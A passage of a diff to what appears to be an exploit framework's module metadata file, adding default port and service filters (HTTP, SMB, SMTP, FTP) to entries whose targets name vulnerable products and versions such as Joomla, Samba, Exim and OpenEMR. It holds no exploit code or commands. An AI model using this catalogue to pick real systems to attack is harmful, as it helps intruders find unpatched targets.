@@ "platform": "OSX", "arch": "ppc", "rport": 139, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Samba 2.2.x - Bruteforce" ], @@ -53667,6 +71159,12 @@ "platform": "Solaris", "arch": "sparc", "rport": 6112, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Solaris 8" ], @@ -53704,6 +71202,12 @@ "platform": "Solaris,Unix", "arch": "x86, x64, sparc", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -53749,6 +71253,12 @@ "platform": "Solaris", "arch": "x86, x64, sparc", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -53783,6 +71293,12 @@ "platform": "Solaris,Unix", "arch": "cmd", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -53817,6 +71333,14 @@ "platform": "Solaris", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Solaris 8/9/10 x86 Samba 3.0.21-3.0.24", "Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24", @@ -53854,6 +71378,14 @@ "platform": "Solaris", "arch": "", "rport": 139, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce", "Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce" @@ -53889,6 +71421,12 @@ "platform": "Solaris", "arch": "x86", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Sun Solaris 9 x86 Brute Force", "Sun Solaris 9 x86", @@ -53927,6 +71465,12 @@ "platform": "Solaris,Unix", "arch": "cmd", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -53960,6 +71504,12 @@ "platform": "Solaris,Unix", "arch": "cmd", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -53993,6 +71543,12 @@ "platform": "Solaris,Unix", "arch": "cmd", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -54027,6 +71583,12 @@ "platform": "Solaris,Unix", "arch": "cmd", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -54065,6 +71627,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -54107,6 +71675,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -54146,6 +71720,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "EPS file" ], @@ -54192,6 +71772,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SVG file", "MVG file", @@ -54227,6 +71813,13 @@ "platform": "Unix", "arch": "cmd", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic" ], @@ -54260,6 +71853,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ProFTPD 1.3.5" ], @@ -54294,6 +71902,12 @@ "platform": "Unix", "arch": "cmd", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -54327,6 +71941,12 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -54359,6 +71979,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -54391,6 +72026,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -54423,6 +72073,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD" ], @@ -54456,6 +72121,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "EPMP" ], @@ -54490,6 +72170,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -54522,6 +72217,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -54555,6 +72265,12 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "pfSense <= 2.4.1" ], @@ -54590,6 +72306,21 @@ "platform": "PHP", "arch": "php", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -54623,6 +72354,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -54658,6 +72404,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -54691,6 +72452,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ftp(1)" ], @@ -54725,6 +72492,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -54758,6 +72540,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Unix CMD", "VMTurbo Operations Manager" @@ -54793,6 +72590,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -54826,6 +72638,12 @@ "platform": "Unix", "arch": "cmd", "rport": 6667, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -54857,6 +72675,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -54894,6 +72718,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -54928,6 +72758,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Exim < 4.86.2" ], @@ -54963,6 +72799,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -54994,6 +72836,12 @@ "platform": "BSD,Linux,Unix", "arch": "cmd, x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Command payload", "Linux x86", @@ -55029,6 +72877,12 @@ "platform": "Unix", "arch": "cmd", "rport": 3632, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -55063,6 +72917,12 @@ "platform": "Unix", "arch": "cmd", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -55099,6 +72959,12 @@ "platform": "Unix", "arch": "cmd", "rport": 8000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -55133,6 +72999,12 @@ "platform": "Unix", "arch": "cmd", "rport": 783, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -55167,6 +73039,12 @@ "platform": "Unix", "arch": "cmd", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -55200,6 +73078,12 @@ "platform": "Unix", "arch": "cmd", "rport": 10050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -55234,6 +73118,12 @@ "platform": "Unix", "arch": "cmd", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -55268,6 +73158,18 @@ "platform": "Unix", "arch": "cmd", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic" ], @@ -55309,6 +73211,18 @@ "platform": "Unix", "arch": "cmd", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic" ], @@ -55347,6 +73261,18 @@ "platform": "Unix", "arch": "cmd", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic" ], @@ -55380,6 +73306,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SonicWall Global Management System Virtual Appliance" ], @@ -55414,6 +73355,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "vAPV 8.3.2.17 / vxAG 9.2.0.34" ], @@ -55450,6 +73397,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Unix-based Tectia SSH 6.3 or prior" ], @@ -55484,6 +73437,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ActualAnalyzer <= 2.81" ], @@ -55517,6 +73485,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Western Digital Arkeia Appliance 10.0.10" ], @@ -55552,6 +73535,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55587,6 +73585,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55620,6 +73633,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55655,6 +73683,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55688,6 +73731,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55723,6 +73781,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -55756,6 +73829,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55791,6 +73879,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55824,6 +73927,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "carberp" ], @@ -55859,6 +73977,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55891,6 +74024,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Clipbucket 2.6" ], @@ -55926,6 +74074,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -55963,6 +74126,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "DataLife Engine 9.7" ], @@ -55996,6 +74174,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56028,6 +74221,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56069,6 +74277,21 @@ "platform": "Linux,PHP,Unix", "arch": "php, cmd, x86, x64", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic (PHP In-Memory)", "Automatic (PHP Dropper)", @@ -56116,6 +74339,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56150,6 +74388,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "EGallery 1.2" ], @@ -56183,6 +74436,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -56217,6 +74485,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Foswiki 1.1.5" ], @@ -56253,6 +74536,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "FreePBX" ], @@ -56284,6 +74582,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56316,6 +74629,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -56349,6 +74677,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56382,6 +74725,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56415,6 +74773,21 @@ "platform": "Linux,Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56450,6 +74823,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Hastymail 2.1.1 RC1" ], @@ -56483,6 +74871,21 @@ "platform": "Linux,PHP", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -56519,6 +74922,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Horde 5" ], @@ -56552,6 +74970,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)" ], @@ -56586,6 +75019,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "InstantCMS 1.6" ], @@ -56623,6 +75071,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Invision IP.Board 3.3.4" ], @@ -56658,6 +75121,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4" ], @@ -56692,6 +75170,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Joomla 3.7.0" ], @@ -56726,6 +75219,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56763,6 +75271,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Joomla 3.x <= 3.4.4" ], @@ -56801,6 +75324,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Joomla 2.5.x <=2.5.13 / Joomla 3.x <=3.1.4" ], @@ -56835,6 +75373,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56868,6 +75421,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Kimai version 0.9.2.x (PHP Payload)" ], @@ -56901,6 +75469,21 @@ "platform": "Linux,PHP", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -56933,6 +75516,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Maarch LetterBox 2.8" ], @@ -56966,6 +75564,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -56997,6 +75610,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57035,6 +75663,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MoinMoin 1.9.5" ], @@ -57069,6 +75712,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57106,6 +75764,21 @@ "platform": "Linux,Unix", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target", "Appliance Nagios XI 2012R1.3 (CentOS 6.x)", @@ -57140,6 +75813,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -57174,6 +75862,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Graph Explorer Component prior to 1.3" ], @@ -57207,6 +75910,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Narcissus" ], @@ -57250,6 +75968,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -57282,6 +76015,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "OpenEMR" ], @@ -57319,6 +76067,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "OpenEMR 4.1.1" ], @@ -57354,6 +76117,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "OpenSIS version 4.5 to 5.2" ], @@ -57388,6 +76166,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57429,6 +76222,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57462,6 +76270,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 8899, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57494,6 +76317,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57529,6 +76367,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57563,6 +76416,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -57594,6 +76462,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57627,6 +76510,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57661,6 +76559,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -57695,6 +76608,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + 